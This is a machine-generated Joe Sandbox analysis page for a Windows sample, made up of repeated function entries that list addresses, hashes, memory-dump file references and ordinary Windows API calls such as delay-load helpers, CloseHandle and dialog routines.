Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 78241a8985b8572a50c2c94d01749b98289b64cad6e2f120e6c2cf1473929d49
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: 78241a8985b8572a50c2c94d01749b98289b64cad6e2f120e6c2cf1473929d49
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d394492d27f11a868a7a654fbc0d7042d116a45ed631d51881506fdd9447dfa8
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: d394492d27f11a868a7a654fbc0d7042d116a45ed631d51881506fdd9447dfa8
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: feb229a51052b480eda892758012bc42a933a9821d0ebe859be52b3028ffcd38
Instruction ID: 70ad526fb55f498ae57e8c9a786e3efcd6acc1624640f14a4ee7eebf80e0d08b
Opcode Fuzzy Hash: feb229a51052b480eda892758012bc42a933a9821d0ebe859be52b3028ffcd38
Instruction Fuzzy Hash: D0A011A22AC202BC3008B200BE02C3A022CECC0BA0330C82EF00FE02C8A880AC080832

Function 0087DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d41f76a70a6a1c7114b6761e288e937824e10cbd43c9dfaeb2ebf74cf39e2674
Instruction ID: a5635aa2e2492c51706346f14ef8fb27e10b99b06e762b43623ac83dc8577d02
Opcode Fuzzy Hash: d41f76a70a6a1c7114b6761e288e937824e10cbd43c9dfaeb2ebf74cf39e2674
Instruction Fuzzy Hash: 65A011A22AC2023C3008B202BE02C3A022CF8C0B22330C20EF00FE008CA88888082832

Function 0087DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d1242d71c6d586d0b5b6af1b009de0b34c20db91f14e74dcd9add77ca506cd7
Instruction ID: 678d9244ef3b7a888fa7caccddf9bd5816519dcb8a6c690604cb0eb578e0d009
Opcode Fuzzy Hash: 6d1242d71c6d586d0b5b6af1b009de0b34c20db91f14e74dcd9add77ca506cd7
Instruction Fuzzy Hash: E0A001A62AD216BC3508B256BE16D3A426CF9C4BA5334CA1EF41FD418DA98898496872

Function 0087DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cee2ae8629247377dbf2c67c89b196b6fa6f7703023022198e95ff14ea6e28a5
Instruction ID: 678d9244ef3b7a888fa7caccddf9bd5816519dcb8a6c690604cb0eb578e0d009
Opcode Fuzzy Hash: cee2ae8629247377dbf2c67c89b196b6fa6f7703023022198e95ff14ea6e28a5
Instruction Fuzzy Hash: E0A001A62AD216BC3508B256BE16D3A426CF9C4BA5334CA1EF41FD418DA98898496872

Function 0087DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fe5f5570c4d0c35eff1907e6b499ac8651e320b6c210ab50eb32b402d484e333
Instruction ID: 678d9244ef3b7a888fa7caccddf9bd5816519dcb8a6c690604cb0eb578e0d009
Opcode Fuzzy Hash: fe5f5570c4d0c35eff1907e6b499ac8651e320b6c210ab50eb32b402d484e333
Instruction Fuzzy Hash: E0A001A62AD216BC3508B256BE16D3A426CF9C4BA5334CA1EF41FD418DA98898496872

Function 0087DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd3f8009da6d52fc67f6f43f1ee893f833310691af6ba2e976fb91973881e7e0
Instruction ID: 678d9244ef3b7a888fa7caccddf9bd5816519dcb8a6c690604cb0eb578e0d009
Opcode Fuzzy Hash: fd3f8009da6d52fc67f6f43f1ee893f833310691af6ba2e976fb91973881e7e0
Instruction Fuzzy Hash: E0A001A62AD216BC3508B256BE16D3A426CF9C4BA5334CA1EF41FD418DA98898496872

Function 0087DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0de713309b4f63c2d6c715370cddb1a27e982cf388f81f5cec680a54de1f343a
Instruction ID: 678d9244ef3b7a888fa7caccddf9bd5816519dcb8a6c690604cb0eb578e0d009
Opcode Fuzzy Hash: 0de713309b4f63c2d6c715370cddb1a27e982cf388f81f5cec680a54de1f343a
Instruction Fuzzy Hash: E0A001A62AD216BC3508B256BE16D3A426CF9C4BA5334CA1EF41FD418DA98898496872

Function 0087DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60a710c42b0c2189e9a30abb1025f27354d7e6d0f18c088b8caaa3faba6c8aea
Instruction ID: 2ffdab1df702effd4b1e21e8982130054ba18d69683510a43d36341fa58f5985
Opcode Fuzzy Hash: 60a710c42b0c2189e9a30abb1025f27354d7e6d0f18c088b8caaa3faba6c8aea
Instruction Fuzzy Hash: B3A011AA2AC20ABC3008A2003E0BC3A023CF8C0B30338C80EF00FC0088AE808C0A0032

Function 0087DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9244ae060b17ea9db0886084601fb48101bd0e36007a724f7b4e25dab7509e6e
Instruction ID: 2ffdab1df702effd4b1e21e8982130054ba18d69683510a43d36341fa58f5985
Opcode Fuzzy Hash: 9244ae060b17ea9db0886084601fb48101bd0e36007a724f7b4e25dab7509e6e
Instruction Fuzzy Hash: B3A011AA2AC20ABC3008A2003E0BC3A023CF8C0B30338C80EF00FC0088AE808C0A0032

Function 0087DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b6ed07001b2d209a15a3f0fc54cf7f723973c8f81d0de829438822e1325cae5
Instruction ID: 2ffdab1df702effd4b1e21e8982130054ba18d69683510a43d36341fa58f5985
Opcode Fuzzy Hash: 1b6ed07001b2d209a15a3f0fc54cf7f723973c8f81d0de829438822e1325cae5
Instruction Fuzzy Hash: B3A011AA2AC20ABC3008A2003E0BC3A023CF8C0B30338C80EF00FC0088AE808C0A0032

Function 0087DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DBD5

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 496d315db22efdc906e3d98a0fb95d0140f23272e82c442b195e1ae16fce7ccb
Instruction ID: 2ffdab1df702effd4b1e21e8982130054ba18d69683510a43d36341fa58f5985
Opcode Fuzzy Hash: 496d315db22efdc906e3d98a0fb95d0140f23272e82c442b195e1ae16fce7ccb
Instruction Fuzzy Hash: B3A011AA2AC20ABC3008A2003E0BC3A023CF8C0B30338C80EF00FC0088AE808C0A0032

Function 0087DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DC36

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d76c226a3bdd1ac09841f3108efc8e2b74b47da8557e3703a3bfee348388e4f
Instruction ID: b8f033b1f44eea04347b3745684a735c57729a350a5c32e7af7a5333b51983d5
Opcode Fuzzy Hash: 5d76c226a3bdd1ac09841f3108efc8e2b74b47da8557e3703a3bfee348388e4f
Instruction Fuzzy Hash: EAA0129516C302FC300C71003D02C3A023CE9C0B10330C80DF00FD01445980BC444031

Function 0087DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DC36

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: acd2dd76dd3e3a992a05de853b43620dcaacb3c1a12875a0c8884568a14e9996
Instruction ID: b8f033b1f44eea04347b3745684a735c57729a350a5c32e7af7a5333b51983d5
Opcode Fuzzy Hash: acd2dd76dd3e3a992a05de853b43620dcaacb3c1a12875a0c8884568a14e9996
Instruction Fuzzy Hash: EAA0129516C302FC300C71003D02C3A023CE9C0B10330C80DF00FD01445980BC444031

Function 0087A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0087A587,C:\Users\user\Desktop,00000000,008A946A,00000006), ref: 0087A326

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 28ef7b179ca37bfb81fe580a214f006d118ca66bb71cb4e82168725be7565375
Instruction ID: 9faa41db1285356be8060a2c93a7826cc31a18d83e2d458fc29e3a7fef5da41f
Opcode Fuzzy Hash: 28ef7b179ca37bfb81fe580a214f006d118ca66bb71cb4e82168725be7565375
Instruction Fuzzy Hash: 73A01230194006568A001B30CC09C1576506760702F0086227002C00B0CB30CC14A500

Function 008696D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,0086968F,?,?,?,?,00891FA1,000000FF), ref: 008696EB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8efd74e29833ce74967c9c8220591940b251bfec61eef60fff750cd0a8a982be
Instruction ID: 04b5149f55038f2783b879296926190f7a3bab49c47ba7f02b88e41852c1e653
Opcode Fuzzy Hash: 8efd74e29833ce74967c9c8220591940b251bfec61eef60fff750cd0a8a982be
Instruction Fuzzy Hash: E1F05E30556B458FDB308A24D549792B7E8FB22735F099B1ED0E7938E0A771684D8F00

Non-executed Functions

Function 0087B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0086130B: GetDlgItem.USER32(00000000,00003021), ref: 0086134F
Part of subcall function 0086130B: SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0087B971
EndDialog.USER32(?,00000006), ref: 0087B984
GetDlgItem.USER32(?,0000006C), ref: 0087B9A0
SetFocus.USER32(00000000), ref: 0087B9A7
